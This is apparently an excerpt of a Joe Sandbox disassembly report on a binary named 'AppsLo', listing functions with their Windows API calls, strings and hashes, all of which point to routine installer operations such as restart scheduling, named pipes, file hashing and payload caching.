AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 008A46C6
GetLastError.KERNEL32 ref: 008A46D0
Sleep.KERNEL32(000003E8), ref: 008A470C
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 008A471D
GetLastError.KERNEL32 ref: 008A4727
CloseHandle.KERNEL32(?), ref: 008A477D

Strings

Failed to get process token., xrefs: 008A4656
user.cpp, xrefs: 008A464C, 008A46A6, 008A46F4, 008A475E
Failed to schedule restart., xrefs: 008A4768
Failed to get shutdown privilege LUID., xrefs: 008A46B0
Failed to adjust token to add shutdown privileges., xrefs: 008A46FE
SeShutdownPrivilege, xrefs: 008A466B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$user.cpp
API String ID: 2241679041-1583736410
Opcode ID: bb3715d71d71e3b5493476b80eff1aba6cfbd9d62c3ce17392e0ddd33eac29bc
Instruction ID: 0f0b2d9f62932e71581457d8053fde087d121fea2404757a09a6c46674c48cee
Opcode Fuzzy Hash: bb3715d71d71e3b5493476b80eff1aba6cfbd9d62c3ce17392e0ddd33eac29bc
Instruction Fuzzy Hash: 22411D33D4067AABFF209BA54C86B6F7A68FB43751F010125FE10FB651E7A89C0045D1

Function 008B4EDF Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 165pipeCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 008B4F0D
GetLastError.KERNEL32(?,00000000,?,?,008A452F,?), ref: 008B4F16
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,008A452F,?), ref: 008B4FB8
GetLastError.KERNEL32(?,008A452F,?), ref: 008B4FC5
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,008A452F), ref: 008B5040
GetLastError.KERNEL32(?,?,?,?,?,?,?,008A452F,?), ref: 008B504B
CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,008A452F,?), ref: 008B508B
LocalFree.KERNEL32(00000000,?,008A452F,?), ref: 008B50B9

Strings

\\.\pipe\%ls, xrefs: 008B4F6E
Failed to allocate full name of cache pipe: %ls, xrefs: 008B5022
Failed to create pipe: %ls, xrefs: 008B4FF6, 008B507C
D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 008B4F08
\\.\pipe\%ls.Cache, xrefs: 008B500C
Failed to allocate full name of pipe: %ls, xrefs: 008B4F84
pipe.cpp, xrefs: 008B4F3A, 008B4FE9, 008B506F
Failed to create the security descriptor for the connection event and pipe., xrefs: 008B4F44

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 1214480349-3253666091
Opcode ID: bea288ad3ccb57555c2d9afa6c61d153cfccfc6fdc13acbb8196015803dfe8ca
Instruction ID: aa3a4a5cca8ff46c53f84d772ef2a0ebd8658e8c1e63880fbc62cc7cf3d643ed
Opcode Fuzzy Hash: bea288ad3ccb57555c2d9afa6c61d153cfccfc6fdc13acbb8196015803dfe8ca
Instruction Fuzzy Hash: 3D519672D41A2ABBDB219AA48C46FEEBB64FF04720F110125FE10FB391D7B55E409AD1

Function 008DFA62 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 173encryptionfileCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,008B9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 008DFAC7
GetLastError.KERNEL32 ref: 008DFAD1
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 008DFB0E
GetLastError.KERNEL32 ref: 008DFB18
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 008DFB5F
ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 008DFB83
GetLastError.KERNEL32 ref: 008DFB8D
CryptDestroyHash.ADVAPI32(00000000), ref: 008DFBCA
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 008DFBE1
GetLastError.KERNEL32 ref: 008DFBFC
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 008DFC34
GetLastError.KERNEL32 ref: 008DFC3E
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 008DFC77
GetLastError.KERNEL32 ref: 008DFC85

Strings

cryputil.cpp, xrefs: 008DFBB1

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
String ID: cryputil.cpp
API String ID: 3955742341-2185294990
Opcode ID: e1f205e1d5daa2bbbd9b42ac0252d0b2fb8a179c41f5ea3b85b6158986200eaa
Instruction ID: 7b3b132ad0750f6dafeb589650c8d23701d9ed9b51bdad655cc34fc8240282de
Opcode Fuzzy Hash: e1f205e1d5daa2bbbd9b42ac0252d0b2fb8a179c41f5ea3b85b6158986200eaa
Instruction Fuzzy Hash: 7751F437D40279ABD7318A518C44BDB7B68FF04761F0142B6BF49FA251E7709D80AAE0

Function 008B9E9E Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON

Download Yara Rule

Strings

copying, xrefs: 008BA030, 008BA038
moving, xrefs: 008BA029
Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 008B9FCB
Failed to get cached path for package with cache id: %ls, xrefs: 008B9EC8
Failed to reset permissions on unverified cached payload: %ls, xrefs: 008B9FF1
Failed to transfer working path to unverified path for payload: %ls., xrefs: 008B9FA4
Failed to move verified file to complete payload path: %ls, xrefs: 008BA06C
Failed to concat complete cached path., xrefs: 008B9EF4
Failed to create unverified path., xrefs: 008B9F6E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID:
String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
API String ID: 0-1289240508
Opcode ID: 4289660964fcb83339fc8563b6570912b5f39c4e41839a85cd848fc37d6c48af
Instruction ID: 5c807ce5d4fc053a93148f1f8b3ee4a08b5118e7f5ce610bee0adcb978ba12fc
Opcode Fuzzy Hash: 4289660964fcb83339fc8563b6570912b5f39c4e41839a85cd848fc37d6c48af
Instruction Fuzzy Hash: DB514B3194051AFADF226AA8CC02FED7B76FF15710F104151FA00F53A1E7769EA1AB86

Function 008A62AA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 008A62F8
GetLastError.KERNEL32 ref: 008A6302

Strings

variable.cpp, xrefs: 008A6326
Failed to set variant value., xrefs: 008A6423
Failed to get OS info., xrefs: 008A6330

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastVersion
String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
API String ID: 305913169-1971907631
Opcode ID: 40b6fcdb1ed248f9e0cec54d2b26145c80c50f590417baa91c5535b70a5f6ded
Instruction ID: 5a852b8661468e05b76d77a5afb7ff6bf6b3426f23f5eefa8cf61b95754f7bd5
Opcode Fuzzy Hash: 40b6fcdb1ed248f9e0cec54d2b26145c80c50f590417baa91c5535b70a5f6ded
Instruction Fuzzy Hash: 7941C571A0522CABEB20DB59CC45FEF7BB8FB8A724F04015AF515E7240E6349E51CB91

Function 008A6037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 008A6062
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 008A6076
GetLastError.KERNEL32 ref: 008A6088
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 008A60DC
GetLastError.KERNEL32 ref: 008A60E6

Strings

variable.cpp, xrefs: 008A60A3, 008A6101
Failed to set variant value., xrefs: 008A6124
Failed to allocate the buffer for the Date., xrefs: 008A60C4
Failed to get the required buffer length for the Date., xrefs: 008A60AD
Failed to get the Date., xrefs: 008A610B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: c4e0f0d068d459f22f8b4686a880177613c910cd73119c4d7433fcff3bc7ff47
Instruction ID: 027722ed3717e79778edfb3ef86f3c032c40f8b5e362f7bf10e5db718c1645f9
Opcode Fuzzy Hash: c4e0f0d068d459f22f8b4686a880177613c910cd73119c4d7433fcff3bc7ff47
Instruction Fuzzy Hash: D831CB32E4066A7BEB219BE98C42FAF7AB8FB06710F150025FF00F7281E6649D5046E1

Function 008DFEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0090B5FC,00000000,?,?,?,?,008C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008DFEF4
GetCurrentProcessId.KERNEL32(00000000,?,008C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008DFF04
GetCurrentThreadId.KERNEL32 ref: 008DFF0D
GetLocalTime.KERNEL32(8007139F,?,008C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008DFF23
LeaveCriticalSection.KERNEL32(0090B5FC,008C12CF,?,00000000,0000FDE9,?,008C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008E001A

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 008DFFC0

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: 3fdc5e7be7f37ec4cb22026c50e818827002c5fb07c8e848876326174dc3de13
Instruction ID: 7ee02e82e0bd8629a1a35eba53fe989f5315bf49ff68e1c5ff9b27cced34f6d4
Opcode Fuzzy Hash: 3fdc5e7be7f37ec4cb22026c50e818827002c5fb07c8e848876326174dc3de13
Instruction Fuzzy Hash: DB419371D0125AAFDF219FA5DC44ABFB7B8FB09711F000526FA01E6291DB358D80EBA1

Function 008B9B43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 008B9BF2
lstrlenW.KERNEL32(?), ref: 008B9C19
FindNextFileW.KERNEL32(00000000,00000010), ref: 008B9C79
FindClose.KERNEL32(00000000), ref: 008B9C84

Part of subcall function 008A3CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 008A3D40
Part of subcall function 008A3CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A3D53

Strings

*.*, xrefs: 008B9BCC
.unverified, xrefs: 008B9B86

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 457978746-2528915496
Opcode ID: 25e9e76f4aaf12c17ed6e7657142c069b98acd8eafd9d944a27fb1761931a9c7
Instruction ID: 6c26974c83bf37d66601651b1493a73f938b71b636a3abeab8fd8ad8dea55244
Opcode Fuzzy Hash: 25e9e76f4aaf12c17ed6e7657142c069b98acd8eafd9d944a27fb1761931a9c7
Instruction Fuzzy Hash: F441BF3090056CAEDB21AB64DD59BEABBB8FF44301F1001A1EA48E12A1EB758EC4DF04

Function 008E887B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 008E88D0
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 008E88E2

Strings

feclient.dll, xrefs: 008E88AA
%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 008E892D
crypt32.dll, xrefs: 008E88A0
%04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 008E88B9

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Time$InformationLocalSpecificSystemZone
String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
API String ID: 1772835396-1985132828
Opcode ID: 93b15684e9db06b794ae59198684dbba2476314b13829b9fdaab5a084e4324bf
Instruction ID: 1054d0a0a78a4cf3d263540f03818d6e98baa56de8feb58912f614bcb6ac59ce
Opcode Fuzzy Hash: 93b15684e9db06b794ae59198684dbba2476314b13829b9fdaab5a084e4324bf
Instruction Fuzzy Hash: 6D21F8A6900128EEDB60DBAADC05EBFB3FCFB4D711F00455ABA45D6180E7389A90D771

Function 008A61DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 008A620F
GetLastError.KERNEL32 ref: 008A6219

Strings

Failed to get the user name., xrefs: 008A6242
variable.cpp, xrefs: 008A6238
Failed to set variant value., xrefs: 008A625E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastNameUser
String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
API String ID: 2054405381-1522884404
Opcode ID: 6493bd5681d72efcf38de189537aca353e8e34ce280ca7668f3c0833bebf910a
Instruction ID: ecfd21b7658a90fe8e0a88146676a9c006bf3ddaac417b88280da1485e519dab
Opcode Fuzzy Hash: 6493bd5681d72efcf38de189537aca353e8e34ce280ca7668f3c0833bebf910a
Instruction Fuzzy Hash: 03012632E403296BD7219B598C0AFAB77A8FF02720F000269FC10EB241EA749E404AD1

Function 008C6B88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,008C6B32,00000000,00000003), ref: 008C6B9F
GetLastError.KERNEL32(?,008C6B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,008C6F28,?), ref: 008C6BA9

Strings

msuuser.cpp, xrefs: 008C6BCD
Failed to set service start type., xrefs: 008C6BD7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ChangeConfigErrorLastService
String ID: Failed to set service start type.$msuuser.cpp
API String ID: 1456623077-1628545019
Opcode ID: a190b0916ad1f296d7ff919ab411fea0b94f96ce7ef3fc2f994f0d14c01b1458
Instruction ID: 00933a0fe204cf9e54ef74cb93d0d84452ab336e3eb99c23572babdd63320073
Opcode Fuzzy Hash: a190b0916ad1f296d7ff919ab411fea0b94f96ce7ef3fc2f994f0d14c01b1458
Instruction Fuzzy Hash: 89F0A73364923677872126995C05E4B7D58FF017B0B110735BF38FA2D0EA69DD1085E4

Function 008D3C76 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 008D3D6E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 008D3D78
UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 008D3D85

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ff48fa3648441c9659ff849ad2e24cc567945270a5b566618d75124ad5c4666c
Instruction ID: bdd29bb675bbee3dca7eafe789934bf891359d2023e1ed79cf6d3075164e5ebc
Opcode Fuzzy Hash: ff48fa3648441c9659ff849ad2e24cc567945270a5b566618d75124ad5c4666c
Instruction Fuzzy Hash: 0B31C47491122C9BCB21DF69D989B8DBBB8FF18310F5042EAE40CA7251E7709F818F45

Function 008D7B87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 008D7C51

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: e5bf3ed007e24953028cbc8a17fff51e8e8595006447f8d954498ee6c0ba2d7d
Instruction ID: 9ff52c92e538612c327edbc2b0763666d4d512c8b74081d6aa2b17250d26560c
Opcode Fuzzy Hash: e5bf3ed007e24953028cbc8a17fff51e8e8595006447f8d954498ee6c0ba2d7d
Instruction Fuzzy Hash: 044115725042186ECB209FB8CC89EAB77B9FB80314F10476AF905D7280F6319E818B50

Function 008E3A5F Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E3BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008E3A8E,?), ref: 008E3C62

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008E3AB2
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008E3AC3

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AllocateCheckCloseInitializeMembershipToken
String ID:
API String ID: 2114926846-0
Opcode ID: 0070790a85267bcf6dc1c666bd05995f9ebf398beba3dc20c9c856e799238960
Instruction ID: 110e48f8a0e36784bbc514497dfa3ea3f54a65c7c26b537b35daadbf44ff92b7
Opcode Fuzzy Hash: 0070790a85267bcf6dc1c666bd05995f9ebf398beba3dc20c9c856e799238960
Instruction Fuzzy Hash: 7F11277190065EAFDB10DFA5CC89BAFB7B8FF09304F504829A551E7151E7709E408B91

Function 008E4440 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(008C923A,?,00000100,00000000,00000000), ref: 008E447B
FindClose.KERNEL32(00000000), ref: 008E4487

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c03b85cf8ef0a463bf800a13bba8532c7871e02d0a86e33b761a832a7e8b0bbc
Instruction ID: 347cfbc6c4f18404409cd8b926272bdca3deff60848c3e59c1058023f3963752
Opcode Fuzzy Hash: c03b85cf8ef0a463bf800a13bba8532c7871e02d0a86e33b761a832a7e8b0bbc
Instruction Fuzzy Hash: 8E01DB3160024C5BDB10EF69DD89E6BB3BCFBC5325F000065F918D7180D6349D498758

Function 008CEC07 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008CEC20

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 54fe9968c06e81204485c56fd25b8da53c64ebf190a36502f904e5956e3448d2
